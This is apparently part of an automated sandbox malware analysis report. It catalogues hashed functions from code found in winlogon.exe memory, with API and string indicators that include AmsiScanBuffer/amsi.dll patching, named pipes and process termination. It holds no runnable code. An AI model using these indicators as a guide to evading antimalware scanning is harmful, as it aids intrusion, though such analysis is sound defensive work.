                                                  • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction Fuzzy Hash: 7D016132B44B4482F711DB12A854B9973A1FB88FD4F898034AE4D43754DE3EC54AC7D6
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID:
                                                  • API String ID: 517849248-0
                                                  • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction ID: a292ab2cfa75126c4a735770990b9ca6806856f301d60702c71bca0c6d7b623e
                                                  • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction Fuzzy Hash: B9016D32B45B8482FB11DB12E868B9973A1FB88FC8F8940349E5E43754DE3DC685C792
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                  • String ID:
                                                  • API String ID: 449555515-0
                                                  • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction ID: ae5bcde55931890828b24d78268571c20791c05152b53787220c891cd16456b3
                                                  • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction Fuzzy Hash: 20011E76B5174882FB269B21E448B9772A1FF98B49F940024CD5D1A358EF3EC04A87D3
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                  • String ID:
                                                  • API String ID: 449555515-0
                                                  • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction ID: 778107bd0b08783d02a6487691dad5ad8f670edfcd41cc8f228037a5f129dca4
                                                  • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction Fuzzy Hash: 13016136B4174882FB269B25E848B9533A4BF48B59F844428D94D06358EF3FC14AC7DB
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                  • String ID:
                                                  • API String ID: 449555515-0
                                                  • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction ID: c63064200cc5015cd9426516bf03d8a10638c949921e829e67ac36650152cb9d
                                                  • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction Fuzzy Hash: 8C012176B5274882FB269B61E458F9573B0FF44B4AF840024D94D46358EF3EC549C793
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FinalHandleNamePathlstrlen
                                                  • String ID: \\?\
                                                  • API String ID: 2719912262-4282027825
                                                  • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction ID: d1ff288a7fe1735c0b389d8a0fb70851f6f610ee87196fd53a68ee1478238ee0
                                                  • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction Fuzzy Hash: BAF0A47374478892FB219B21F494B9B7361FBC4B9CFC44021CE4946954DE6DC64AC7D2
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FinalHandleNamePathlstrlen
                                                  • String ID: \\?\
                                                  • API String ID: 2719912262-4282027825
                                                  • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction ID: a75b9edf9b8994863e05616ee0606fecf03f18b00d3583885107efc661ca5ccb
                                                  • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction Fuzzy Hash: 0DF0A43375478892F7218B20F484B9A7360FB84B9CFC4C025DA4946554DE7EC74AC7D6
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FinalHandleNamePathlstrlen
                                                  • String ID: \\?\
                                                  • API String ID: 2719912262-4282027825
                                                  • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction ID: 5131f7decd79886618750e5d372dbf6a6da6afe116d4c20a90690d0bf9f1d3e7
                                                  • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction Fuzzy Hash: 69F0AF73B5878892FB218B24F8D4B997371FB44B8CFC44021CA4942958DE6EC788CB52
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                  • Instruction ID: c70e5ec6ea267bb5cb580a1a018e7bc41a37316a57f8b87e098493fbd84ad30a
                                                  • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                  • Instruction Fuzzy Hash: E6F0683265470941FA114B24D884B9B7720FF89759FD402199E69491E4CF2EC44AC6C3
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
• Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
Similarity
• API ID: CombinePath
• String ID: \\.\pipe\
• API String ID: 3422762182-91387939
• Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
• Instruction ID: a6a4aab0aeac4f6197f237278a9c0a3b7006fc945381a0c775642f0a2f533f1f
• Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
• Instruction Fuzzy Hash: 4FF05E76B44B8881FA058B13B91459BB260FFC8FC9F848430EE0A0BB18DE69C44687C3
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
• Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
• Instruction ID: 70c250347f594e71b17261cfaf8131f5a1330f05be77572a744952222a5b5b64
• Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
• Instruction Fuzzy Hash: 6FF06273A4470941FA118B24E845BA93730FF49769FD54219AA6A451E4CF2EC44AC6CB
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
• Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
Similarity
• API ID: CombinePath
• String ID: \\.\pipe\
• API String ID: 3422762182-91387939
• Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
• Instruction ID: 127a490b207412094bdf773d7bc7f314ed27483ed9a8622cdd057b0091c70391
• Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
• Instruction Fuzzy Hash: C8F0BE72B44B8881FA058B13B8045A97221BF48FC8FC5D430FE0A07B28CE39D54383C6
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
• Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
• Instruction ID: c75c0d1d0a7dfc333aa3dd880c92edac9d32d090e86cc0fd6d0cdfce16583c4f
• Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
• Instruction Fuzzy Hash: 91F09673A4270981FB118B14D854B997720FF45769FD40319DA69451E8CF2EC548C383
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
• Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
Similarity
• API ID: CombinePath
• String ID: \\.\pipe\
• API String ID: 3422762182-91387939
• Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
• Instruction ID: c82dd5a25fec972a5fbc4a73daeaf237b653ae254e79d6f593719484f7f8d2f0
• Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
• Instruction Fuzzy Hash: 90F08276F45B9881FA058B17F9245997661BF48FC9FC88430EE4A07B58CF2DC5458783
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
• Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
Similarity
• API ID: AddressLibraryLoadProcSleep
• String ID: AmsiScanBuffer$amsi.dll
• API String ID: 188063004-3248079830
• Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
• Instruction ID: 2907fe888d2c04c09e7fe008df7f310d9433daeb94394008bd5d98f7c7cdab68
• Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
• Instruction Fuzzy Hash: B4D04C36E91708A5F90B6B11D854BA73262FFD4B49FC40415890A193649E2EC55A93D3
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
• Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
Similarity
• API ID: AddressLibraryLoadProcSleep
• String ID: AmsiScanBuffer$amsi.dll
• API String ID: 188063004-3248079830
• Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
• Instruction ID: 7246112f9244b4226b796b0cd794045831b2067abd02715776a67b51b8a182b6
• Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
• Instruction Fuzzy Hash: 2ED0EC32E9170881F90B6B00DC54B9432217F94B18FC18018950A012649E3ED54A93DB
APIs
Memory Dump Source
• Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
• Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
• Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
• Instruction ID: 99275fefa3e122d711dffe7bf7ab3ffa9f0cd8fb82334eb92c6249ce1198314e
• Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
• Instruction Fuzzy Hash: C1021A33659B8886E761CB15F49079AB7A0F7C4788F500015EACE97BA8DF7DC485CB82
APIs
Memory Dump Source
• Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
• Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
• Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
• Instruction ID: aa8ac499eb692d5db1208b44326d97ecb6e913e81b2b611b9ce91f482cf527ce
• Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
• Instruction Fuzzy Hash: 5302FD33658B8486E761CB19F49079AB7B0F7C4798F504019EA8E47BA8DF7EC445CB82
APIs
Memory Dump Source
• Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
• Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
• Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
• Instruction ID: 6a2463f9efe1ef2445148160494f6b45801955cb1664d84a517ab5a6c6691788
• Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
• Instruction Fuzzy Hash: DD51AF37B5470987F326CB16A440EAA73A1FF88B89FD140199D5A53B54DB3AC8068BD3
APIs
Memory Dump Source
• Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
• Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
• Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
• Instruction ID: f376f59fa2a11924f07aeae0f4e24fca5b39dbef64f999cd2058c410ead475d3
• Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
• Instruction Fuzzy Hash: 04518F37B4470987F366CB15E441E9AB3A4FF88B58F908119AD5A43794DB3BD8068BC3
APIs
Memory Dump Source
• Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
• Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
• Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
• Instruction ID: 3378145a71404300d070cab9fed9048c8f8061d59c9752aa83fb82bf50c4289a
• Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
• Instruction Fuzzy Hash: 8851A133A547098AF326CF16A450EAA73A5FF88B89FD10018DD4A13754DB7AC8078BC3
APIs
Memory Dump Source
• Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
• Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
• Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
• Instruction ID: 9e5fd35e134bb6201940a3d8bb8db161ac21b1b241632d42dbc14525f9094f05
• Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
• Instruction Fuzzy Hash: 7E518233B54705CBF726CF15A440A9A73A4FF84B88F808119AE4A43754DB3AD906C7C3
APIs
Memory Dump Source
